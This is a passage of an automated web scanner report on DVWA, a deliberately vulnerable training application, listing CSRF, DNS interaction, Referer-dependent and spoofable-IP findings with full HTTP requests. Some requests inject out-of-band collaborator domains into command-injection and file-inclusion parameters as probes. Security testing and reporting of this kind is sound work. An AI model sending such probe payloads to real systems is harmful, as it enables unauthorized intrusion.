<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Command Injection :: Damn Vulnerable Web Application (DVW
...[SNIP]...
Request 2
POST /vulnerabilities/exec/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=ba6a8058ae560e63e839b83b9a4bc007
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://JqXHrZCkBObbnu.com:4280/vulnerabilities/exec/
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 23
ip=CcwtLI&Submit=Submit
Response 2
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:56:52 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4104
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Command Injection :: Damn Vulnerable Web Application (DVW
...[SNIP]...
24.6. https://pentest-ground.com:4280/vulnerabilities/javascript/
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Tentative |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/javascript/ |
Issue detail
The request appears to be vulnerable to cross-site request forgery (CSRF) attacks against unauthenticated functionality. This is unlikely to constitute a security vulnerability in its own right, however it may facilitate exploitation of other vulnerabilities affecting application users.
The original request contains parameters that look like they may be anti-CSRF tokens. However the request is successful if these parameters are removed.
Request 1
POST /vulnerabilities/javascript/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=6e6a7523219fb665633f9393ffa391c8
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/javascript/
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 66
token=8b479aefbd90795395b3e7089ae0dc09&phrase=ChangeMe&send=Submit
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:38:48 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 8321
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: JavaScript Attacks :: Damn Vulnerable Web Application (DV
...[SNIP]...
Request 2
POST /vulnerabilities/javascript/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=6e6a7523219fb665633f9393ffa391c8
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://MYNDvuDiMLQKQB.com:4280/vulnerabilities/javascript/
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 27
phrase=ChangeMe&send=Submit
Response 2
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:45:25 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 8320
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: JavaScript Attacks :: Damn Vulnerable Web Application (DV
...[SNIP]...
24.7. https://pentest-ground.com:4280/vulnerabilities/upload/
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Tentative |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/upload/ |
Issue detail
The request appears to be vulnerable to cross-site request forgery (CSRF) attacks against unauthenticated functionality. This is unlikely to constitute a security vulnerability in its own right, however it may facilitate exploitation of other vulnerabilities affecting application users.
Request 1
POST /vulnerabilities/upload/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=c3fe1bc74b5052e630d33195ac436b03
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/upload/
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary0NbBo2XreaJ5VlCk
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 401
------WebKitFormBoundary0NbBo2XreaJ5VlCk
Content-Disposition: form-data; name="MAX_FILE_SIZE"
100000
------WebKitFormBoundary0NbBo2XreaJ5VlCk
Content-Disposition: form-data; name="uploaded"; fil
...[SNIP]...
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:40:47 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4050
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: File Upload :: Damn Vulnerable Web Application (DVWA)</ti
...[SNIP]...
Request 2
POST /vulnerabilities/upload/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=c3fe1bc74b5052e630d33195ac436b03
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://FYDDckqmgkTNzC.com:4280/vulnerabilities/upload/
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary0NbBo2XreaJ5VlCk
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 401
------WebKitFormBoundary0NbBo2XreaJ5VlCk
Content-Disposition: form-data; name="MAX_FILE_SIZE"
100000
------WebKitFormBoundary0NbBo2XreaJ5VlCk
Content-Disposition: form-data; name="uploaded"; fil
...[SNIP]...
Response 2
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:46:57 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4050
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: File Upload :: Damn Vulnerable Web Application (DVWA)</ti
...[SNIP]...
24.8. https://pentest-ground.com:4280/vulnerabilities/weak_id/
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Tentative |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/weak_id/ |
Issue detail
The request appears to be vulnerable to cross-site request forgery (CSRF) attacks against unauthenticated functionality. This is unlikely to constitute a security vulnerability in its own right, however it may facilitate exploitation of other vulnerabilities affecting application users.
Request 1
POST /vulnerabilities/weak_id/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=ef21cca5a5b7e9f24f5235ea0fb84b87
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/weak_id/
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:47:18 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 3427
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: dvwaSession=1
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Weak Session IDs :: Damn Vulnerable Web Application (DVWA
...[SNIP]...
Request 2
POST /vulnerabilities/weak_id/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=ef21cca5a5b7e9f24f5235ea0fb84b87
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://yuxAdNXjcinkFx.com:4280/vulnerabilities/weak_id/
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 2
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:49:29 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 3427
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: dvwaSession=112
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Weak Session IDs :: Damn Vulnerable Web Application (DVWA
...[SNIP]...
25. External service interaction (DNS)
Previous
Next
There are 2 instances of this issue:
Issue background
The ability to induce an application to interact with an arbitrary external service, such as a web or mail server, does not constitute a vulnerability in its own right. This might even be the intended behavior of the application. However, in some cases, it can indicate a vulnerability with serious consequences.
If you can trigger DNS-based interactions, it is normally possible to trigger interactions using other service types. Burp Scanner reports these as separate issues. You may find that a payload, such as a URL, only triggers a DNS-based interaction, even though you were expecting interactions with a different service as well. This could be due to egress filters on the network layer that prevent the application from connecting to these other services. However, some systems perform DNS lookups without any intention of connecting to the remote host. This behavior is typically harmless.
The ability to send requests to other systems can allow the vulnerable server to be used as an attack proxy. By submitting suitable payloads, an attacker can cause the application server to attack other systems that it can interact with. This may include public third-party systems, internal systems within the same organization, or services available on the local loopback adapter of the application server itself. Depending on the network architecture, this may expose highly vulnerable internal services that are not otherwise accessible to external attackers.
Issue remediation
You should review the purpose and intended use of the relevant application functionality,
and determine whether the ability to trigger arbitrary external service interactions is intended behavior.
If so, you should be aware of the types of attacks that can be performed via this behavior and take appropriate measures.
These measures might include blocking network access from the application server to other internal systems, and hardening the application server itself to remove any services available on the local loopback adapter.
If the ability to trigger arbitrary external service interactions is not intended behavior, then you should implement a whitelist of permitted services and hosts, and block any interactions that do not appear on this whitelist.
Out-of-Band Application Security Testing (OAST) is highly effective at uncovering high-risk features, to the point where finding the root cause of an interaction can be quite challenging. To find the source of an external service interaction, try to identify whether it is triggered by specific application functionality, or occurs indiscriminately on all requests. If it occurs on all endpoints, a front-end CDN or application firewall may be responsible, or a back-end analytics system parsing server logs. In some cases, interactions may originate from third-party systems; for example, a HTTP request may trigger a poisoned email which passes through a link-scanner on its way to the recipient.
References
Vulnerability classifications
25.1. https://pentest-ground.com:4280/vulnerabilities/exec/ [ip parameter]
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/exec/ |
Issue detail
It is possible to induce the application to perform server-side DNS lookups of arbitrary domain names.
The payload v1xypyfowr9j80juzsaa0ngq3h9axbl39vwlka.oastify.com was submitted in the ip parameter.
The application performed a DNS lookup of the specified domain.
Request 1
POST /vulnerabilities/exec/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=d0ba91771b783950c31dcfd0b174fbb8
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/exec/
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 23
ip=v1xypyfowr9j80juzsaa0ngq3h9axbl39vwlka.oastify.com&Submit=Submit
Response 1
HTTP/1.1 504 Gateway Time-out
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:57:37 GMT
Content-Type: text/html
Content-Length: 569
Connection: close
<html>
<head><title>504 Gateway Time-out</title></head>
<body>
<center><h1>504 Gateway Time-out</h1></center>
<hr><center>nginx/1.27.2</center>
</body>
</html>
<!-- a padding to disable MSIE an
...[SNIP]...
Collaborator DNS interaction
The Collaborator server received a DNS lookup of type A for the domain name v1xypyfowr9j80juzsaa0ngq3h9axbl39vwlka.oastify.com.
The lookup was received from IP address 109.74.192.20:8676 at 2024-Oct-21 09:57:33.801 UTC.
25.2. https://pentest-ground.com:4280/vulnerabilities/fi/ [page parameter]
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/fi/ |
Issue detail
It is possible to induce the application to perform server-side DNS lookups of arbitrary domain names.
The payload https://mkap8pyffisarr2lijt1jezhm8s1gw4nsef43t.oastify.com/?file1.php was submitted in the page parameter.
The application performed a DNS lookup of the specified domain.
Request 1
GET /vulnerabilities/fi/?page=https%3a%2f%2fmkap8pyffisarr2lijt1jezhm8s1gw4nsef43t.oastify.com%2f%3ffile1.php HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=143c86fc083ce7d7f684f49dfdbc3c28
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/fi/?page=include.php
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:45:23 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 3978
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<html><body>vgsii9v5kr93m8q3ai58vfzjlgngjgjfigz</body></html><br />
<b>Warning</b>: Cannot modify header information - headers already sent by (output started at https://mkap8pyffisarr2lijt1jezhm8s1g
...[SNIP]...
Collaborator DNS interaction
The Collaborator server received a DNS lookup of type A for the domain name mkap8pyffisarr2lijt1jezhm8s1gw4nsef43t.oastify.com.
The lookup was received from IP address 109.74.192.20:21909 at 2024-Oct-21 09:45:23.001 UTC.
26. Referer-dependent response
Previous
Next
There are 2 instances of this issue:
Issue description
Application responses may depend systematically on the presence or absence of the Referer header in requests. This behavior does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.
Common explanations for Referer-dependent responses include:
- Referer-based access controls, where the application assumes that if you have arrived from one privileged location then you are authorized to access another privileged location. These controls can be trivially defeated by supplying an accepted Referer header in requests for the vulnerable function.
- Attempts to prevent cross-site request forgery attacks by verifying that requests to perform privileged actions originated from within the application itself and not from some external location. Such defenses are often not robust, and can be bypassed by removing the Referer header entirely.
- Delivery of Referer-tailored content, such as welcome messages to visitors from specific domains, search-engine optimization (SEO) techniques, and other ways of tailoring the user's experience. Such behaviors often have no security impact; however, unsafe processing of the Referer header may introduce vulnerabilities such as SQL injection and cross-site scripting. If parts of the document (such as META keywords) are updated based on search engine queries contained in the Referer header, then the application may be vulnerable to persistent code injection attacks, in which search terms are manipulated to cause malicious content to appear in responses served to other application users.
Issue remediation
The Referer header is not a robust foundation on which to build access controls. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.
If the contents of responses is updated based on Referer data, then the same defenses against malicious input should be employed here as for any other kinds of user-supplied data.
Vulnerability classifications
26.1. https://pentest-ground.com:4280/phpinfo.php
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Firm |
Host: |
https://pentest-ground.com:4280 |
Path: |
/phpinfo.php |
Request 1
GET /phpinfo.php HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=d694d24b4b0d9e955286864450e25ede
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 10:00:41 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 83052
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<style type="text/css">
body {background-color: #fff; co
...[SNIP]...
<td class="v">http </td></tr>
<tr><td class="e">CONTEXT_PREFIX </td><td class="v"><i>
...[SNIP]...
</th></tr>
<tr><td class="e">HTTP Request </td><td class="v">GET /phpinfo.php HTTP/1.0 </td></tr>
...[SNIP]...
</th></tr>
<tr><td class="e">$_REQUEST['security']</td><td class="v">low</td></tr>
...[SNIP]...
Request 2
GET /phpinfo.php HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=d694d24b4b0d9e955286864450e25ede
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 2
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 10:00:42 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 82765
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<style type="text/css">
body {background-color: #fff; co
...[SNIP]...
26.2. https://pentest-ground.com:4280/vulnerabilities/fi/
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Firm |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/fi/ |
Request 1
GET /vulnerabilities/fi/?page=file3.php HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=203536d9ff1aefc1bc842561eeb56926
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/fi/?page=include.php
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:53:23 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4448
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: File Inclusion :: Damn Vulnerable Web Application (DVWA)<
...[SNIP]...
<br />You came from: <em>https://pentest-ground.com:4280/vulnerabilities/fi/?page=include.php</em><br />I'm hosted at: <em>pentest-ground.com</em><br /><br />
...[SNIP]...
Request 2
GET /vulnerabilities/fi/?page=file3.php HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=203536d9ff1aefc1bc842561eeb56926
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 2
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:53:24 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4350
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: File Inclusion :: Damn Vulnerable Web Application (DVWA)<
...[SNIP]...
27. Spoofable client IP address
Previous
Next
There are 2 instances of this issue:
Issue description
If an application trusts an HTTP request header like X-Forwarded-For to accurately specify the remote IP address of the connecting client, then malicious clients can spoof their IP address. This behavior does not necessarily constitute a security vulnerability, however some applications use client IP addresses to enforce access controls and rate limits. For example, an application might expose administrative functionality only to clients connecting from the local IP address of the server, or allow a certain number of failed login attempts from each unique IP address.
Consider reviewing relevant functionality to determine whether this might be the case.
Issue remediation
HTTP request headers such as X-Forwarded-For, True-Client-IP, and X-Real-IP are not a robust foundation on which to build any security measures, such as access controls. Any such measures should be replaced with more secure alternatives that are not vulnerable to spoofing.
If the platform application server returns incorrect information about the client's IP address due to the presence of any particular HTTP request header, then the server may need to be reconfigured, or an alternative method of identifying clients should be used.
Vulnerability classifications
27.1. https://pentest-ground.com:4280/phpinfo.php
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Firm |
Host: |
https://pentest-ground.com:4280 |
Path: |
/phpinfo.php |
Request 1
GET /phpinfo.php HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=d694d24b4b0d9e955286864450e25ede
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 10:00:52 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 83052
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<style type="text/css">
body {background-color: #fff; co
...[SNIP]...
Request 2
GET /phpinfo.php HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
